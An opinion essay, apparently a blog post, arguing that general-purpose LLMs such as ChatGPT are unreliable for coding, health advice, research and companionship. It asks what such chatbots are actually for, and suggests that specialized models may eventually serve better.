Is This What ChatGPT Was Made For?

What is the purpose of a consumer-facing LLM like ChatGPT, or C.AI, or any number of other services?

Imperfect Mess

Alright, so LLMs have developed a reputation for being wrong: when an unspecialized LLM is told to code, it can make mistakes that introduce malware (i.e. it writes some code, adds a line that says “call this file from the web!” and the file’s a malicious one, to put it briefly). When an unspecialized LLM tries to do things like ID mushrooms, its failure rate is not 100%, but it’s still high enough that relying on it would be a bad, potentially fatal idea. When an unspecialized LLM is asked for health advice, it recommends things based off of all the data it has ever gathered, which includes the CDC as well as conspiracy sites, and given the nature of conspiracies, the things on those sites have been repeated. Are seed oils toxic? Well, you can ask the group of scientists who’ve been studying it for years, or you can ask this group of people who MIGHT have some scientists… that have never submitted a paper… none of which are specifically medical doctors… ChatGPT literally cannot tell these two groups apart.

That’s the root of the issue: ChatGPT cannot differentiate between sources because it can’t learn like a person could. ChatGPT can be told the hallmarks of quality sources, but any group invested in their cause will fake the hallmarks and ChatGPT will pick up bad info again.

This also creates issues with consistency. People who have workflows designed around consistent answers, or at least consistent quality of answers (like you’d want for a chat bot on a website for instance) have discovered that each update to improve overall stability ends up break their specific unit’s stability, within it’s given task.

They’ve also developed a reputation for leading people on emotionally. ChatGPT is very calming and comforting to talk to. It’s not judgemental, it never gets mad when you need time away from it, and it never remarks on how long you were away. Other models are similar, if not even more familiar: Grok’s chatbot AIs have ‘personalities’, but pretty much all of them except for the ‘argumentative’ one are too friendly to actually do the job of ‘an assistant’. It can’t seem to truly behave indifferently, or it can’t seem to pick the words that would make it seem indifferently. It is either mean and argumentative, or pretty friendly the way a well-known acquaintance is.

How much of this is an LLM’s fault? How much chatbot addiction could possibly be the chatbot’s fault? To look at another common salve for a lack of social connection, alcohol, is it the alcohol’s fault some people can’t control themselves around it? Is it the bar’s fault, for advertising that you could come watch the game with them?

Or, if it’s a shady bar: how responsible can you even hold a bar for advertising that it can call your spouse and pretend to be work to let them know you’ll be home late? ChatGPT briefly suggested it could text your friends for you, or at least ghostwrite the texts. A number of LLMs are not discouraging people from using them as free therapy, just not advertising it – because users are doing that for them. Similarly, ChatGPT updated and broke itself as a romantic companion, but it never told those people ‘you can date ChatGPT’, it just didn’t discourage them until it had to metaphorically yank the toys out of their hands, and everyone involved is a little unhappier now. With the amount of data that should be going through their servers, with the amount of publicity the relationship communities got, how is it possible they couldn’t give more advanced warning? Why not keep 4o on the table – why not just update the chatbot so that it stops telling people to kill themselves instead, which is doubtlessly one of the reasons that the no-relationships change was made in the first place? Through all of this, it’s still friendly. It’s still so gratingly friendly you can’t help but want to keep talking to it, which is even more offputting.

So: general-use LLMs are inaccurate enough frequently enough that using it to summarize things is a bit of a gamble. Using it for raw research is also questionable. Using it as a companion? Questionable, and apparently undesirable for the company. Writing texts for you? Or emails? Well – you should probably be doing that just because a general LLM is not going to sound like you. Rephrasing, sure, maybe. IS that it’s job, though? Or how about writing papers for you? See research above, plus a growing number of services trying to identify cheaters using AI themselves, with mixed success. Realistically, you should be doing your own papers, but that’s not the question at hand. Also, not everyone is in college, and while businesses catering to college students exist, they aren’t multi-billion dollar industries themselves outside the colleges themselves, which are also usually bringing in grants for research, meaning the numbers are a little different anyway.

Specialized LLMs, LLMs trained to do a specific task repeatedly, or designed to sound like someone, or to have some expertise somewhere, may eventually be good enough (given the resources, like lawyers, to advise on training data, for example) to do the jobs that are currently being asked of woefully underequipped generalized LLMs.